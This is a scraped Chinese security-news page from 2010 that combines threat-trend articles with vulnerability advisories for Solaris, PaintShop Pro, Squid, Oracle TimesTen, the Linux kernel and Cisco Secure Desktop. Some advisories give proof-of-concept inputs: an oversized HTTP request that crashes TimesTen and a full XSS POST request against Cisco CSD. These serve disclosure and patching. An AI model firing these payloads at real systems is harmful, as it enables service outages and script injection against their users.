迈克菲实验室警告，银行木马在2009年嚣张展示了自己的新战术，2010年，它将变得更为复杂，并能轻易绕过银行当前所使用的防护措施。新技术中包括一种木马功能，它能够悄无声息地中断合法交易，并且进行未经授权的 “取款”，同时检查用户的交易额度，以免超出这一额度时引发银行警觉。电子邮件附件是恶意软件长期利用的传递方式，它不仅会在数量上有所增加，还会越来越多地将目标锁定企业、记者和个人用户。 网络犯罪分子继续将目标锁定在Adobe Reader和Flash等应用程序 2009年，迈克菲实验室发现针对客户端软件的攻击不断增加。由于Adobe应用程序的日益普及，迈克菲实验室预计网络犯罪分子将继续锁定Adobe产品——主要是Acrobat Reader和Flash这两个全球最广泛部署的应用程序。迈克菲实验室预计，2010年，网络犯罪对Adobe产品的利用程度将有可能超越微软 Office应用程序。 僵尸网络将从集中模式转为P2P控制模式 僵尸网络是几乎可以发起各种网络攻击（从垃圾邮件到身份窃取）的常见手段，它将继续利用由全球近乎无限供给的盗取计算能力和带宽。在成功铲除一系列僵尸网络（包括McColo ISP）之后，僵尸网络控制者必须适应网络安全专业人士不断对其施加的压力。2010年，迈克菲实验室预计，网络犯罪分子将大量使用P2P控制模式，这是一种分布式的弹性僵尸网络，而不是我们现在见到的集中托管模式。对于网络犯罪分子来说，由于安全领域日益积极努力关闭并阻止访问僵尸网络，这种方式所带来的收益将最终超越点对点模式的成本。 网络犯罪：采取法律手段的良机 明年标志着国际执法机构打击网络犯罪进入第十个年头。迈克菲实验室与各国政府合作，在确定、跟踪和打击网络犯罪方面取得了重大进展。迈克菲相信，2010年，我们将在追剿网络犯罪分子的行动中取得更辉煌的战绩。 社交,网站,三方,应用程序,2010,黑客 行业资讯 admin 未知 2010-02-04 09:19 http://www.serversteam.com/S/News/news-20100204685.html 北京时间2月3日上午消息，据国外媒体报道，卡巴斯基实验室的研究人员上周五称，窃取一个拥有320多名关注者的Twitter账号，黑客即可获利 1000美元。 这些黑客从2005年起便开始开发一种全新的 　　北京时间2月3日上午消息，据国外媒体报道，卡巴斯基实验室的研究人员上周五称，窃取一个拥有320多名关注者的Twitter账号，黑客即可获利 1000美元。 这些黑客从2005年起便开始开发一种全新的数据窃取软件，而如今，这种恶意软件的危害已经日益显现。黑客的主要目标是窃取银行密码，还有一些是窃取网络游戏账号。 卡巴斯基实验室研究员比斯杜谢夫(Dmitry Bestuzhev)称，快速增长的数据窃取者正在将间谍软件分类，以便窃取尽可能多的用户信息。 卡巴斯基2009年共确定了7万个这类程序，较2008年的数量翻了一番，其中银行密码窃取程序较2008年增加两倍。 比斯杜谢夫称，他曾发现，在俄罗斯黑客论坛上出售Gmail账户的价格为2500卢布(约合82美元)，窃取文件存储网站RapidShare 用户账号每月的费用为5美元。除此之外，黑客还在论坛上叫价出售窃取来的Skype、即时通信工具和Facebook账号。 比斯杜谢夫表示，社交网站账号的价格要取决于用户名的好坏和好友的多少，例如，一个拥有320多名关注者的Twitter账号在黑客论坛上可以卖到1000美元。他认为，用户名较为简单的账号还会获得更高的售价。与MSN账号约1.4美元的价格相比，Twitter账号可谓价格不菲。而且这种窃取行为相对较为简单，只需要成功入侵一台电脑，便可获得价值1000美元的数据。(书聿) 黑客,叫卖,Twitter,账号,获利 行业资讯 admin 新浪科技 2010-02-04 09:18 http://www.serversteam.com/S/News/news-20100204684.html 寒假期间，各种名目的培训班热闹起来，黑客们也利用此机会紧盯各类补习培训网站。近日，金山毒霸云安全中心发现大量培训类网站被挂马，如上海疯狂英语、新课程免费资源网以及福建语 寒假期间，各种名目的培训班热闹起来，黑客们也利用此机会紧盯各类补习培训网站。近日，金山毒霸云安全中心发现大量培训类网站被挂马，如上海疯狂英语、新课程免费资源网以及福建语文网等近千家网站被黑客染指。     由于大量补习培训类网站存在风险，用户电脑随时可能被挂马网站感染病毒。金山安全实验室反病毒专家李铁军表示，每逢年关将至的时候，病毒数量总会快速增长，今年电脑病毒的爆发尤具特色，流氓广告木马成为主体，它们利用捆绑程序、欺骗下载等方式进入电脑，疯狂修改IE首页和释放网页链接文件。在恶意网址方面，钓鱼网址已远远超过传统的挂马网址，并将魔爪伸向了线下，利用手机短信、语音电话等，试图将那些对网络不熟悉的人也拉进陷阱。由于政府相关部门开始限制个人申请CN域名，恶意网址受到重创，开始逃离CN域名，转向COM域名阵营。     金山毒霸病毒应急中心建议：最近频繁浏览培训类网站的用户需特别注意，此时为自己的上网搜索和客户端提供安全保护尤其重要，无杀毒软件的用户可安装金山毒霸2009版并升级到最新版本，已安装其他杀毒软件的用户可免费下载金山网盾以有效拦截有关挂马网站。安装了网盾的用户在上网搜索浏览时，如遇到被挂马的网站，网页搜索结果就会显示3种情况：是绿钩证明安全；是红叉证明此网页不安全，已被挂马；问号则表示服务器查询超时。 黑客,紧盯,寒假,培训,网站 行业资讯 admin 长沙晚报 2010-02-04 09:13 http://www.serversteam.com/S/News/news-20100204683.html 本周，互联网巨头谷歌公司为旗下的Chrome浏览器建立基金项目，向发现普通漏洞的研究人员支付500美元，最高可达 1337美元。 据资讯网站Computerworld报道，本周，互联网巨头谷歌公司为旗下的     本周，互联网巨头谷歌公司为旗下的Chrome浏览器建立基金项目，向发现普通漏洞的研究人员支付500美元，最高可达 1337美元。 据资讯网站Computerworld报道，本周，互联网巨头谷歌公司为旗下的Chrome浏览器建立基金项目，向发现普通漏洞的研究人员支付 500美元，最高可达1337美元。 据Chrome安全小组成员克里斯·伊万透露，谷歌成立该项目是为了进一步提高Chrome浏览器和Chromium软件的安全性。由于谷歌软件坚持开源原则，大部分代码都向公共开放，这也给产品的安全带来一定隐患。 但该项目暂时不包括还处在研发阶段的ChromeOS。伊万表示，此举主要是为了鼓励更多研究人员关注谷歌产品，谷歌会给予适当的物质奖励。 业界分析师阿米尼也认为，物质奖励会吸引更多的人参与到发现漏洞的活动中。上周，微软发布的八个IE重要漏洞中，至少有五个已经被ZDI安全机构发现，但并没有引起足够重视。 相比其他浏览器竞争对手，Chrome只能算是后起之秀。Chrome浏览器在各项浏览器性能测试中表现出色，得分高居榜首。它在不到两年的发展中，占据主流产品第三的位置但市场份额增长缓慢，与排名前列的IE和Firefox差距还很大。 据了解，谷歌并不是第一次作出这样尝试的大公司。微 谷歌,500,美元,悬赏,Chrome,漏洞 行业资讯 admin Computerworld 2010-02-04 09:05 http://www.serversteam.com/S/News/news-20100204682.html 新华网北京１月２４日电 工业和信息化部发言人２４日就互联网安全、黑客攻击等问题接受新华社记者专访，强调指出中国法律禁止任何形式的黑客攻击行为，中国本身就是黑客攻击的最大受 新华网北京１月２４日电  工业和信息化部发言人２４日就互联网安全、黑客攻击等问题接受新华社记者专访，强调指出中国法律禁止任何形式的黑客攻击行为，中国本身就是黑客攻击的最大受害国，愿就推动互联网安全和打击网络黑客攻击等违法犯罪活动加强国际合作。 记者：请您介绍一下中国遭受网络黑客攻击的情况。     工信部发言人：我国政府高度重视互联网的发展与管理。自１９９４年互联网正式引入我国以来，经过十几年快速发展，互联网已经成为我国重要的社会基础设施，为促进经济社会更好更快发展发挥了重要作用。但是，同世界其他国家一样，我国互联网始终面临着黑客攻击、网络病毒等违法犯罪活动的严重威胁。据有关抽样数据显示，仅２００９年我国被境外控制的计算机ＩＰ地址就达１００多万个，被黑客组织篡改的网站多达４．２万个；在受网络病毒威胁方面，去年我国仅被“飞客”蠕虫一种网络病毒感染的计算机数量每月就达１８００万台，占全球感染主机总量的３０％，位列全球第一。在上述受攻击的计算机中，不仅涉及大量网民，而且涉及金融、交通、能源等多个部门，对我经济发展和人民正常生产生活造成严重危害。可以说，我国也是网络攻击最大的受害者。 记者：请介绍中国对网络黑客攻击的态度及采取的措施。     工信部发言人：中国政府始终坚决反对任何形式的网络攻击行为。坚持依法管理，不断完善互联网管理方面的法律法规，在《刑法》《治安管理处罚法》《全国人民代表大会常务委员会关于维护互联网安全的决定》《计算机信息系统安全保护条例》《电信条例》《计算机病毒防治管理办法》等多项法律法规中，对打击网络攻击等犯罪行为作出了明确规定。２００９年，我部先后出台了《互联网网络安全信息通报实施办法》和《木马和僵尸网络监测和处置机制》，先后多次组织专项治理行动，有效遏制了木马和僵尸网络传播；组织２７０多家单位共同开展网络安全事件的监测、预警和应急处置，国家互联网应急中心仅２００９年就有效处置网络安全事件１１００多起，为多家银行、电子商务网站和用户挽回了经济损失。同时，积极开展行业自律工作，指导中国互联网协会组织基础电信运营企业、网络安全厂商、增值服务提供商、搜索引擎、域名注册机构等成立了“中国反网络病毒联盟”并签署自律公约，净化了网络环境，维护公共互联网网络安全。 记者：请问我国对网络安全国际合作持什么态度？     工信部发言人：我国积极致力于在网络安全、网络反恐等方面开展国际交流合作，在亚太经合组织电信工作组中积极参与安全与繁荣工作组的各项工作，承担并完成了“应对僵尸网络治理策略和技术手段指南”，对国际电信联盟正在开展的“网络安全议程”给予了积极关注和支持；自２００４年起积极参与与东盟各国的网络安全合作，多次参加东盟组织的网络安全应急演练。２００９年，还分别与东盟和上合组织成员国签订了《中国－东盟电信监管理事会关于网络安全问题的合作框架》和《上合组织成员国保障国际信息安全政府间合作协定》。 记者：您对国际上一些人指责“中国政府参与黑客攻击”持何看法？     工信部发言人：互联网安全问题是一个全球性问题，需要各国加强合作，共同努力。对于反对黑客攻击的问题，中国政府的方针政策是公开透明、一以贯之的。以或明或暗的方式，指责“中国政府参与黑客攻击”是毫无根据的，是抹黑中国的行为，我们对此坚决反对。我愿再次重申，我们愿意在打击黑客攻击等违法犯罪方面与世界各国开展广泛、深入的交流合作，积极借鉴世界各国的有益经验，为建设好、管理好互联网做出积极贡献。 工业,信息化,网络黑客,攻击,记者 行业资讯 admin 未知 2010-02-04 09:03 http://www.serversteam.com/S/News/news-20100204681.html 据外电报道，微软周四发布漏洞补丁，保护IE浏览器用户免遭谷歌曾遭到的网络攻击。 谷歌上周称其与其他20多家企业成为黑客攻击目标。微软后来承认，黑客利用其浏览器漏洞发动了攻击。 据外电报道，微软周四发布漏洞补丁，保护IE浏览器用户免遭谷歌曾遭到的网络攻击。　　 谷歌上周称其与其他20多家企业成为黑客攻击目标。微软后来承认，黑客利用其浏览器漏洞发动了攻击。 微软称新补丁至关重要，应立即安装。 微软称，该补丁可修复IE浏览器八个漏洞，而最严重的漏洞使得黑客可远程控制用户电脑。 微软表示，多数IE浏览器用户可实行系统自动更新，无需采取任何行动。需要手动更新的用户，可登录下载安装。 微软,紧急,浏览器,漏洞,补丁 行业资讯 admin 搜狐IT 2010-02-04 09:02 http://www.serversteam.com/S/Vuln/vuln_680.html 受影响系统： 奇虎360 360安全卫士 6.1.5.1009 奇虎360 360安全卫士 描述：BUGTRAQ ID: 38037 360安全卫士是在中国广泛使用的免费上网安全软件。 360安全卫士会在安装过程中在用户系统上安装一个注册表 受影响系统：     奇虎360 360安全卫士 6.1.5.1009     奇虎360 360安全卫士 描述：BUGTRAQ  ID: 38037 360安全卫士是在中国广泛使用的免费上网安全软件。 360安全卫士会在安装过程中在用户系统上安装一个注册表操作程序，该程序可以被用来绕过操作系统的安全检查机制任意操作（设置、删除等）用户的注册表。由于该程序没有对调用者进行检查，导致任意程序（如各种木马程序等）可以通过该后门任意操作（设置、删除等）用户的注册表系统。 该程序包括两个文件： 1. bregdrv.sys：内核模式驱动，该驱动程序通过调用操作系统的未公开CmXxx系列函数来操作注册表，另外由于操作系统内部本身维护了很多同步数据、缓存数据，直接调用CmXxx系列函数操作注册表极有可能造成系统内部数据不同步，严重影响系统安全性，甚至可能导致用户正常数据丢失。 2. bregdll.dll：用户态动态库，该动态库封装了对bregdrv.sys的调用，为用户态程序提供注册表操作后门的接口。 <*来源：NT Internals     链接：http://it.rising.com.cn/info/2010-02-02/6604.html         http://bbs.360.cn/3229787/34800737.html?recommend=1         http://secunia.com/advisories/38424/         http://marc.info/?l=bugtraq&m=126513117624580&w=2 *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://www.exploit-db.com/download/11317 建议：厂商补丁： 奇虎360 ------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载，或通过产品的自动升级功能修复： http://www.360.cn/ 360,安全卫士,bregdrv.sys,bregdll.d 漏洞公告 admin 绿盟科技 2010-02-04 09:01 http://www.serversteam.com/S/Vuln/vuln_679.html 受影响系统： Sun Solaris 10.0_x86 Sun OpenSolaris snv_69 - snv_133 描述：BUGTRAQ ID: 38016 CVE ID: CVE-2010-0453 Solaris是一款由Sun开发和维护的商业UNIX操作系统。 Solaris的内核中负责处理UCODE_GET_VERSION IOCTL请求的代 受影响系统：     Sun Solaris 10.0_x86     Sun OpenSolaris snv_69 - snv_133 描述：BUGTRAQ  ID: 38016 CVE ID: CVE-2010-0453 Solaris是一款由Sun开发和维护的商业UNIX操作系统。 Solaris的内核中负责处理UCODE_GET_VERSION IOCTL请求的代码中存在空指针引用漏洞，本地用户可以通过发送特制的IOCTL请求导致拒绝服务。以下是intel/io/ucode_drv.c中的有漏洞代码段： [..] static int ucode_ioctl(dev_t dev, int cmd, intptr_t arg, int mode, cred_t *cr, int             *rval) { ..    switch (cmd) {    case UCODE_GET_VERSION: {      int size;      uint32_t *revp, *rev_array;      ucode_errno_t rc = EM_OK;      STRUCT_DECL(ucode_get_rev_struct, h);      STRUCT_INIT(h, mode); [1] if (ddi_copyin((void *)arg,          STRUCT_BUF(h), STRUCT_SIZE(h), mode))        return (EFAULT); [2] if ((size = STRUCT_FGET(h, ugv_size)) > NCPU)        return (EINVAL);      if ((rev_array = STRUCT_FGETP(h, ugv_rev)) == NULL)        return (EINVAL);      size *= sizeof (uint32_t); [3] revp = kmem_zalloc(size, KM_SLEEP);      if (ddi_copyin((void *)rev_array, revp, size, mode) != 0) {        kmem_free(revp, size);        return (EINVAL);      } [4] rc = ucode_get_rev(revp); [..] [1] h结构填充了用户控制的IOCTL输入数据。 [2] 从用户控制的数据中获得了size值。 [3] 如果size值为0，kmem_zalloc()会返回NULL，导致revp指向NULL。 [4] revp用作了ucode_get_rev()的函数指针。 i86pc/os/microcode.c： [..] /* * Returns microcode revision from the machcpu structure. */ ucode_errno_t ucode_get_rev(uint32_t *revp) {    int i;    ASSERT(ucode);    ASSERT(revp);    if (!ucode->capable(CPU))      return (EM_NOTSUP);    mutex_enter(&cpu_lock);    for (i = 0; i < max_ncpus; i++) {      cpu_t *cpu;      if ((cpu = cpu_get(i)) == NULL)        continue; [5] revp[i] = cpu->cpu_m.mcpu_ucode_info->cui_rev; [..] [5] 这个分配导致了空指针引用，因为revp == NULL。 <*来源：Tobias Klein     链接：http://marc.info/?l=bugtraq&m=126505373907787&q=p3         http://tk-blog.blogspot.com/2010/01/kernel-null-pointer-dereference-in.html         http://secunia.com/advisories/38452/ *> 建议：厂商补丁： Sun --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://sunsolve.sun.com/search/document.do?assetkey=1-21-143913-01-1 Solaris,CODE_GET_VERSION,IOCTL 漏洞公告 admin 绿盟科技 2010-02-04 09:00 http://www.serversteam.com/S/Vuln/vuln_678.html 受影响系统： Corel PaintShop Pro Photo X2 Ultimate 12.50 描述：BUGTRAQ ID: 37980 PaintShop Pro Photo X2是一套兼具完整功能与简易操作的专业级数码影像编辑软件。 PaintShop Pro Photo X2错误的相信了FPX文件中用户 受影响系统：     Corel PaintShop Pro Photo X2 Ultimate 12.50 描述：BUGTRAQ  ID: 37980 PaintShop Pro Photo X2是一套兼具完整功能与简易操作的专业级数码影像编辑软件。 PaintShop Pro Photo X2错误的相信了FPX文件中用户控制的数据并在拷贝数据时用作了循环计数器，这可能导致堆溢出。 首先，应用以常数调用malloc()分配了0xC08字节长的缓冲区： /----- [Module: JPEGACC.dll] 095F4D97  |.  68 080C0000   PUSH 0C08 ;size of the buffer to be allocated 095F4D9C  |.  E8 9F4D0000   CALL JPEGACC.095F9B40 ;call to malloc() 095F4DA1  |.  83C4 04       ADD ESP,4 095F4DA4  |.  894424 10     MOV DWORD PTR SS:[ESP+10],EAX ;saves the pointer returned by malloc() - -----/ 之后将FPX文件中的数据拷贝到了上述分配的缓冲区。在以下反汇编代码可见FPX文件中0x1406偏移处所分配的字节被解释为内部循环的循环计数器，以确定应调用多少次拷贝操作。拷贝操作是在09264C50地址的调用中执行的，拷贝到缓冲区的数据也是部分从FPX文件的0x1416偏移处开始获取的。 /----- [Module: JPEGACC.dll] 09264DD2  |>  8B6C24 24     /MOV EBP,DWORD PTR SS:[ESP+24] 09264DD6  |.  33D2          |XOR EDX,EDX 09264DD8  |.  8A55 00       |MOV DL,BYTE PTR SS:[EBP]                ; byte at offset 0x1406 in the FPX file (user controlled) 09264DDB  |.  45            |INC EBP 09264DDC  |.  8BFA          |MOV EDI,EDX                             ; EDI=inner loop counter, byte at offset 0x1406 (user controlled) 09264DDE  |.  896C24 24     |MOV DWORD PTR SS:[ESP+24],EBP 09264DE2  |.  85FF          |TEST EDI,EDI 09264DE4  |.  74 28         |JE SHORT JPEGACC.09264E0E 09264DE6  |.  7E 26         |JLE SHORT JPEGACC.09264E0E 09264DE8  |.  8D68 08       |LEA EBP,DWORD PTR DS:[EAX+8] 09264DEB  |>  8B5424 28     |/MOV EDX,DWORD PTR SS:[ESP+28]          ; EDX starts pointing to offset 0x1416 of the FPX file 09264DEF  |.  33C0          ||XOR EAX,EAX 09264DF1  |.  8BCE          ||MOV ECX,ESI 09264DF3  |.  55            ||PUSH EBP 09264DF4  |.  8A02          ||MOV AL,BYTE PTR DS:[EDX]               ; reads bytes starting from offset 0x1416 (user controlled) 09264DF6  |.  46            ||INC ESI 09264DF7  |.  53            ||PUSH EBX 09264DF8  |.  42            ||INC EDX 09264DF9  |.  50            ||PUSH EAX 09264DFA  |.  51            ||PUSH ECX 09264DFB  |.  895424 38     ||MOV DWORD PTR SS:[ESP+38],EDX 09264DFF  |.  E8 4CFEFFFF   ||CALL JPEGACC.09264C50                  ; copies user-controlled data to the buffer 09264E04  |.  83C4 10       ||ADD ESP,10 09264E07  |.  4F            ||DEC EDI                                ; is the loop counter == 0? 09264E08  |.^ 75 E1         |\JNZ SHORT JPEGACC.09264DEB             ; if not, repeat the copy operation 09264E0A  |.  8B4424 10     |MOV EAX,DWORD PTR SS:[ESP+10] 09264E0E  |>  D1E6          |SHL ESI,1 09264E10  |.  43            |INC EBX 09264E11  |.  83FB 08       |CMP EBX,8 09264E14  |.^ 7E BC         \JLE SHORT JPEGACC.09264DD2 - -----/ 内部循环的每次迭代都会将0x80个对象拷贝到缓冲区，每次大小为8个字节，也就是大小为0xC08字节的缓冲区最多只能处理三次迭代，因此如果用户受骗打开的FPX文件中0x1406偏移处的字节值大于3就可以触发溢出，向缓冲区末尾后的某些位置写入可控字节。在退出外部循环后，应用会进入另一个循环，向缓冲区写入几个值为0的dword，此处的迭代次数为拷贝到缓冲区的对象数，也就是乘以0x80。 /----- [Module: JPEGACC.dll] 09264E26  |.  8BD6          MOV EDX,ESI                              ; EDX = number of objects copied to the buffer 09264E28  |>  C701 00000000 /MOV DWORD PTR DS:[ECX],0 09264E2E  |.  83C1 08       |ADD ECX,8 09264E31  |.  4A            |DEC EDX 09264E32  |.^ 75 F4         \JNZ SHORT JPEGACC.09264E28 - -----/ 如果所处理的FPX文件如上所述触发了缓冲区溢出，这个循环也会写过缓冲区的限制，破坏内存内容，包括临近的块元数据，最终在应用试图通过调用 ntdll.RtlFreeHeap释放所分配的缓冲区时导致内存访问破坏。 /----- [Module: ntdll.dll] 7C9108D3    8902            MOV DWORD PTR DS:[EDX],EAX Access violation when writing to [00000000] - -----/ <*来源：Francisco Falcon     链接：http://marc.info/?l=bugtraq&m=126507516309185&w=2 *> 建议：厂商补丁： Corel ----- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.corel.com/servlet/Satellite/us/en/Product/1184951547051 PaintShop,FPX,文件,解析,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:59 http://www.serversteam.com/S/Vuln/vuln_677.html 受影响系统： Anders Hedstrouml;m C++ Sockets Library 2.3.9 不受影响系统： Anders Hedstrouml;m C++ Sockets Library 2.3.9 描述：BUGTRAQ ID: 38021 C++ Sockets是一个跨平台的套接字库，实现包括TCP、UDP、ICMP、SCTP协议。 受影响系统：     Anders Hedström C++ Sockets Library < 2.3.9 不受影响系统：     Anders Hedström C++ Sockets Library 2.3.9 描述：BUGTRAQ  ID: 38021 C++ Sockets是一个跨平台的套接字库，实现包括TCP、UDP、ICMP、SCTP协议。 远程攻击者可以通过发送包含有多于200个头（MAX_HTTP_HEADER_COUNT）的特制HTTP请求报文导致使用C++ Sockets库的应用终止。 <*来源：Anders Hedström     链接：http://secunia.com/advisories/38448/ *> 建议：厂商补丁： Anders Hedström -------------------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.alhem.net/Sockets/Changelog C++,Sockets,HTTP,远程,拒绝服务 漏洞公告 admin 绿盟科技 2010-02-04 08:58 http://www.serversteam.com/S/Vuln/vuln_676.html 受影响系统： Squid Web Proxy Cache 3.1 Squid Web Proxy Cache 3.0 Squid Web Proxy Cache 2.x 不受影响系统： Squid Web Proxy Cache 3.1.0.16 Squid Web Proxy Cache 3.0.STABLE22 描述：BUGTRAQ ID: 37522 Squid是一个高效的Web缓存及代理 受影响系统：     Squid Web Proxy Cache 3.1     Squid Web Proxy Cache 3.0     Squid Web Proxy Cache 2.x 不受影响系统：     Squid Web Proxy Cache 3.1.0.16     Squid Web Proxy Cache 3.0.STABLE22 描述：BUGTRAQ  ID: 37522 Squid是一个高效的Web缓存及代理程序，最初是为Unix平台开发的，现在也被移植到Linux和大多数的Unix类系统中，最新的Squid可以运行在Windows平台下。 Squid没有正确地验证用户提供数据，确定了Squid接收端口的可信任客户端或外部服务器可以通过发送特制的仅有首部的DNS报文导致临时的拒绝服务。 <*来源：Fabian Yamaguchi     链接：http://secunia.com/advisories/38451/         http://www.squid-cache.org/Advisories/SQUID-2010_1.txt *> 建议：临时解决方法： * 打开ignore_unknown_nameservers选项。 厂商补丁： Squid ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.squid-cache.org/Versions/v2/HEAD/changesets/12597.patch http://www.squid-cache.org/Versions/v3/3.0/changesets/squid-3.0-9151.patch http://www.squid-cache.org/Versions/v3/3.1/changesets/squid-3.1-9853.patch Squid,DNS,报文,拒绝服务,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:57 http://www.serversteam.com/S/Vuln/vuln_675.html 受影响系统： Oracle TimesTen In-Memory Database 7.0.5 描述：BUGTRAQ ID: 38019 Oracle TimesTen In-Memory Database是优化了内存的关系数据库系统。 TimesTen In-Memory数据库的timestend守护程序没有正确的处理HTTP请求， 受影响系统：     Oracle TimesTen In-Memory Database 7.0.5 描述：BUGTRAQ  ID: 38019 Oracle TimesTen In-Memory Database是优化了内存的关系数据库系统。 TimesTen In-Memory数据库的timestend守护程序没有正确的处理HTTP请求，远程攻击者可以通过向TCP 17000端口发送超长的HTTP请求导致服务崩溃。 <*来源：Evgeny Legerov （aland@freeradius.org）     链接：http://secunia.com/advisories/38446/         http://intevydis.blogspot.com/2010/02/oracle-timesten-705-timestend-dos.html *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ "GET hello?" + "&"*10000 + "=a HTTP/1.0\r\n\r\n" 建议：厂商补丁： Oracle ------ 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.oracle.com Oracle,In-Memory,数据库,拒绝服务,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:57 http://www.serversteam.com/S/Vuln/vuln_674.html 受影响系统： Xerox WorkCentre 4150 描述：BUGTRAQ ID: 38010 Xerox WorkCentre是一款数码打印复印一体机。 Xerox WorkCentre的PJL守护程序实现中存在缓冲区溢出漏洞，远程攻击者可以通过向该服务发送恶意请求 受影响系统：     Xerox WorkCentre 4150 描述：BUGTRAQ  ID: 38010 Xerox WorkCentre是一款数码打印复印一体机。 Xerox WorkCentre的PJL守护程序实现中存在缓冲区溢出漏洞，远程攻击者可以通过向该服务发送恶意请求报文导致崩溃，必须硬重启设备才可以恢复运行。 <*来源：Francis Provencher     链接：http://marc.info/?l=bugtraq&m=126504862629540&w=2 *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://marc.info/?l=bugtraq&m=126504862629540&w=2 建议：厂商补丁： Xerox ----- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.xerox.com Xerox,WorkCentre,程序,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:56 http://www.serversteam.com/S/Vuln/vuln_673.html 受影响系统： Linux kernel 2.6.x 不受影响系统： Linux kernel 2.6.33-rc6 描述：BUGTRAQ ID: 38027 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel在设置进程的personality时存在错误，本地用户在执 受影响系统：     Linux kernel 2.6.x 不受影响系统：     Linux kernel 2.6.33-rc6 描述：BUGTRAQ  ID: 38027 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel在设置进程的personality时存在错误，本地用户在执行缺少ELF解释器的64位应用时可能触发分段错误，导致内核崩溃。 漏洞起因是fs/binfmt_elf.c文件中的load_elf_binary()函数，该函数在检查ELF解释器可用之前调用了 SET_PERSONALITY()，将之前的32位进程转换为了64位进程。如果execve()成功，这不会导致问题，但在 SET_PERSONALITY()之后由于无法找到解释器，open_exec()调用会失败，execve()几乎立即返回错误。在/proc /PID/maps中错误的映射了vsyscall页，而进程仍在运行。这时就会触发分段错误，内核会崩溃。 <*来源：Mathias Krause     链接：http://marc.info/?l=linux-mm&m=126466407724382&q=p2         http://secunia.com/advisories/38354/ *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://marc.info/?l=linux-mm&m=126466407724382&q=p5 建议：厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.kernel.org/pub/linux/kernel/v2.6/testing/patch-2.6.33-rc6.bz2 Linux,Kernel,64位,Personality,拒 漏洞公告 admin 绿盟科技 2010-02-04 08:52 http://www.serversteam.com/S/Vuln/vuln_672.html 受影响系统： Cisco Secure Desktop 3.5 不受影响系统： Cisco Secure Desktop 3.5.841 描述：BUGTRAQ ID: 37960 CVE(CAN) ID: CVE-2010-0440 Cisco Secure Desktop（CSD）可以通过加密降低远程用户注销或SSL VPN会话超时后Cooki 受影响系统：     Cisco Secure Desktop < 3.5 不受影响系统：     Cisco Secure Desktop 3.5.841 描述：BUGTRAQ  ID: 37960 CVE(CAN) ID: CVE-2010-0440 Cisco Secure Desktop（CSD）可以通过加密降低远程用户注销或SSL VPN会话超时后Cookies、浏览器历史记录、临时文件和下载内容在系统上所遗留的风险。 Cisco Secure Desktop没有充分地验证特制的请求是否是由提交POST请求用户所提供，导致以下文件中存在跨站脚本漏洞： /----- https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us - -----/ 使用POST变量： /----- Starting, please wait..."><script>alert(1);</script> - -----/ 在HTML内容中使用的时候没有编码POST字段的内容，因此允许攻击者控制内容注入JavaScript代码。此外，由于上述POST内容在 binary/mainv.js中用作了eval()函数的输入，这还可能导致向start.html页面注入JavaScript代码并在eval() 函数的环境中执行： /----- 282            http_request.open('POST', path, false); 283            http_request.send(msgs); 284            var trans = new Array(); 285            try { 286                eval(http_request.responseText); 287            } catch (e) {} - -----/ <*来源：Matias Pablo Brutti     链接：http://marc.info/?l=bugtraq&m=126506410826098&w=2         http://tools.cisco.com/security/center/viewAlert.x?alertId=19843         http://secunia.com/advisories/38397/ *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ /----- REQUEST: POST https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1 Host: {IP} User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://{IP}/CACHE/sdesktop/install/start.htm Content-Type: application/xml; charset=UTF-8 Cookie: webvpnLang=en-us; webvpnlogin=1 Pragma: no-cache Cache-Control: no-cache Content-Length: 56 Starting, please wait..."><script>alert(1);</script> RESPONSE: HTTP/1.1 200 OK Server: Cisco AWARE 2.0 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Mon, 16 Nov 2009 14:14:07 GMT Content-Length: 122 trans["Starting, please wait...\"><script>alert(1);</script>"] = "Starting, please wait...\"><script>alert(1);</script>"; - -----/ 建议：厂商补丁： Cisco ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.cisco.com/warp/public/707/advisory.html Cisco,translation,参数,跨站,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:51 http://www.serversteam.com/S/Vuln/vuln_671.html 受影响系统： Mozilla Bugzilla 3.5 Mozilla Bugzilla 3.4 Mozilla Bugzilla 3.3 不受影响系统： Mozilla Bugzilla 3.5.3 Mozilla Bugzilla 3.4.5 描述：BUGTRAQ ID: 38026 CVE ID: CVE-2009-3387 Bugzilla是很多软件项目都在使用的基于W 受影响系统：     Mozilla Bugzilla 3.5     Mozilla Bugzilla 3.4     Mozilla Bugzilla 3.3 不受影响系统：     